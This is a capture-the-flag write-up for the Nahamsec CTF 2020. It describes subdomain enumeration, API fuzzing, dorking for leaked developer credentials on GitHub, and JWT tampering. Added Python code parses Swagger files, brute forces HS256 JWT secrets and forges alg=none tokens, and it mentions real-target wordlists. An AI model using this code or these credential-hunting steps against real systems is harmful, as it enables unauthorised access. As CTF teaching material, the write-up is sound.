Nahamsec CTF

The first step was to check where the picture was hosted with a simple right click -> view image:


This led to a new domain: nahamsec.net/Nahamsec_CTF_Giveaway.jpg

Whenever a new domain turns up, I like to begin with subdomain discovery, my go-to tool being amass:

amass -d nahamsec.net -brute -active -o nahamsec-subs.txt

http://30kftw.nahamsec.net
https://30kftw.nahamsec.net
http://api-admin.nahamsec.net
https://api-admin.nahamsec.net
http://api-dev.nahamsec.net
https://api-dev.nahamsec.net

The api- subdomains instantly drew my eye, so I kicked off some file/directory brute forcing against them and started checking out the other subdomains:

ffuf -u http://api-admin.nahamsec.net/FUZZ -w juicy.txt -ac -recursion -v
ffuf -u http://api-dev.nahamsec.net/FUZZ -w juicy.txt -ac -recursion -v

I also noticed that 30kftw.nahamsec.net showed the message "Welcome to Admin Site, Admin area only allowed from our intranet!", which made me note it down as a possible SSRF target (an endpoint that only trusts internal requests is exactly what you want to reach through a server-side fetch).

ffuf then came back with a hit:

[Status: 200, Size: 823, Words: 85, Lines: 2]
api-admin.nahamsec.net/swagger.json  

Discovering a Swagger specification is an absolute gold mine for understanding an API and finding possible issues. This one revealed two paths: POST /api/getflag and GET /api/token.

However, both returned a 500 INTERNAL SERVER ERROR. This led me to try several things: adding /v0.1/, /v1/ and /v2/ to the paths, and trying the endpoints on the api-dev subdomain too, theorising that they might also exist in the development area. None of this returned anything either. While playing around I noticed that a GET to /api/tokens would ask for credentials.

The Swagger spec also gave two other clues: the description "Oh boy, everyone is talking about WW3 and you still hacking? even our developer was in rush that he left the credentials somewhere!" and the tag "nahamsecCTF2020".
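Pulling the paths, the auth requirements and the free-text clues out of a Swagger file, then expanding the paths across hosts and version prefixes, is the manual work described in the two paragraphs above. The following is an added example, not code from the original writeup: the spec embedded in it is a constructed stand-in that only mirrors the two paths the page mentions (the real swagger.json was not reproduced on the page), and the header name "Token", the description and the security definition are assumptions for illustration.

```python
import json

# Constructed stand-in for api-admin.nahamsec.net/swagger.json. NOT the real file:
# it only mirrors the two paths and the tag the writeup mentions; the security
# definition and header name are assumptions made for this example.
SWAGGER_JSON = json.dumps({
    "swagger": "2.0",
    "info": {"title": "constructed example API",
             "description": "developer left the credentials somewhere (constructed)"},
    "basePath": "/api",
    "tags": [{"name": "nahamsecCTF2020"}],
    "securityDefinitions": {"token": {"type": "apiKey", "in": "header", "name": "Token"}},
    "paths": {
        "/getflag": {"post": {"summary": "constructed", "security": [{"token": []}]}},
        "/token":   {"get":  {"summary": "constructed"}},
    },
})

HTTP_METHODS = {"get", "post", "put", "patch", "delete", "head", "options"}


def parse_operations(spec_text):
    """Return (METHOD, full_path, requires_auth) for every operation in a Swagger 2.0 spec.

    requires_auth is True when the operation, or the spec globally, declares a
    security requirement; that tells you which endpoints to expect a 401 from.
    """
    spec = json.loads(spec_text)
    base = spec.get("basePath", "").rstrip("/")
    ops = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:   # skip "parameters" etc.
                continue
            needs_auth = bool(op.get("security") or spec.get("security"))
            ops.append((method.upper(), base + path, needs_auth))
    return ops


def spec_clues(spec_text):
    """Collect the human-written strings (title, descriptions, tags) worth dorking on."""
    spec = json.loads(spec_text)
    clues = [spec.get("info", {}).get("title", ""),
             spec.get("info", {}).get("description", "")]
    clues += [tag.get("name", "") for tag in spec.get("tags", [])]
    return [c for c in clues if c]


def candidate_urls(hosts, operations, version_prefixes=("/v0.1", "/v1", "/v2")):
    """Expand every operation across hosts and version prefixes.

    The prefix is tried both before the base path (/v1/api/getflag) and after it
    (/api/v1/getflag), since APIs differ on where they put the version.
    """
    urls = []
    for host in hosts:
        for method, path, _ in operations:
            urls.append((method, f"http://{host}{path}"))
            for prefix in version_prefixes:
                urls.append((method, f"http://{host}{prefix}{path}"))
                base, _, rest = path.lstrip("/").partition("/")
                urls.append((method, f"http://{host}/{base}{prefix}/{rest}"))
    return urls


if __name__ == "__main__":
    ops = parse_operations(SWAGGER_JSON)
    for op in ops:
        print(op)
    print("clues:", spec_clues(SWAGGER_JSON))
    targets = candidate_urls(["api-admin.nahamsec.net", "api-dev.nahamsec.net"], ops)
    for method, url in targets:
        print(method, url)
```

Feed the real swagger.json to parse_operations and the (METHOD, URL) pairs to whatever request tool you prefer; the requires_auth flag tells you in advance which endpoints should prompt for credentials rather than 500.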

This led me to think about where credentials might be posted or left up by mistake: Pastebin, GitHub, unsecured storage like an S3 bucket, etc.

I checked Pastebin with some Google dorks, e.g. site:pastebin.com "nahamsecCTF2020".

I checked S3 storage:

aws s3 ls s3://nahamsecCTF2020
An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist

and other variations of the name. This also made me think of claiming these bucket names to throw some people off, but I thought that might be too mean :p

And finally some GitHub dorking: user:nahamsec api, user:nahamsec credentials, etc.

This returned nothing either. However, remembering a recent report on HackerOne's Hacktivity, you can sometimes find secrets in the GitHub accounts of developers actively working on a project for the organisation, not necessarily in the organisation's own GitHub.

This led me to search for nahamsecCTF2020 across the whole of GitHub, which brought me to this repository: https://github.com/garagosy/nahamsecCTF2020, whose api.py contained some credentials.

I then went back and used the credentials on the GET /api/tokens endpoint found earlier, which returned a JWT. This led me to try several things: POSTing to /api/getflag with several different Token: headers, and tampering with the JWT, which currently carried id = 2, by attempting to brute force the signing secret, since it was signed with HS256 and the secret might be guessable.


However, this didn't lead to anything. I thought it could be a dead end, but I went back to the endpoints to look for a clue as to where I could abuse the JWT with an alg = none header and no signature, since I couldn't sign it genuinely. In the process I ended up sending a GET /api/getflag, which asked me for credentials! I entered the ones from earlier, which revealed the flag! :)
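The two JWT attacks tried above, brute forcing an HS256 secret and forging an alg = none token, are worth seeing in code, together with the server-side check that defeats the second one. This is an added example, not the CTF's token or the author's tooling: the sample token is constructed here with a deliberately weak secret, the wordlist is tiny for illustration, and the claim name "id" is taken from the writeup while "s3cret" and the other strings are invented. Only the standard library is used, so the mechanics are not hidden behind a JWT package.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """JWT uses base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a token the way a server using HS256 would."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{b64url(_compact(header))}.{b64url(_compact(payload))}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def decode_unverified(token: str):
    """Look inside a token without checking it: (header, payload, signature_b64)."""
    h, p, s = token.split(".")
    return json.loads(unb64url(h)), json.loads(unb64url(p)), s


def brute_force_hs256(token: str, wordlist):
    """Return the candidate secret that reproduces the signature, or None.

    Offline attack: only the token is needed, so the target never sees a request.
    """
    h, p, s = token.split(".")
    if json.loads(unb64url(h)).get("alg") != "HS256":
        return None
    signing_input = f"{h}.{p}".encode()
    target = unb64url(s)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def forge_alg_none(payload: dict) -> str:
    """Unsigned token: header says alg=none and the signature part is empty."""
    header = {"alg": "none", "typ": "JWT"}
    return f"{b64url(_compact(header))}.{b64url(_compact(payload))}."


def verify_hs256(token: str, secret: bytes):
    """Server-side check done right: pin the algorithm instead of trusting the header.

    Returns the payload on success, None otherwise. Because alg is pinned to HS256,
    an alg=none token is rejected before any signature comparison happens.
    """
    h, p, s = token.split(".")
    if json.loads(unb64url(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, unb64url(s)):
        return None
    return json.loads(unb64url(p))


# Constructed sample data: a weak secret and a short wordlist, for illustration only.
WEAK_SECRET = b"s3cret"
SAMPLE_TOKEN = sign_hs256({"id": 2}, WEAK_SECRET)
WORDLIST = ["password", "secret", "nahamsec", "s3cret", "admin"]

if __name__ == "__main__":
    print("payload as issued:", decode_unverified(SAMPLE_TOKEN)[1])
    recovered = brute_force_hs256(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", recovered)
    if recovered:
        # With the secret, re-sign a tampered payload (id=1) that the server will accept.
        print("tampered, valid:", verify_hs256(sign_hs256({"id": 1}, recovered.encode()), WEAK_SECRET))
    # The alg=none token is only accepted by a verifier that trusts the header's alg.
    print("alg=none accepted by pinned verifier:", verify_hs256(forge_alg_none({"id": 1}), WEAK_SECRET))
```

Against a real target, swap WORDLIST for a proper list (rockyou, jwt-secrets lists) and keep the attack offline; tools such as jwt_tool or hashcat mode 16500 do the same HMAC loop much faster. The verify_hs256 function is what you hope the target does not do: if it pinned the algorithm and used a strong secret, both attacks described on this page would be dead ends.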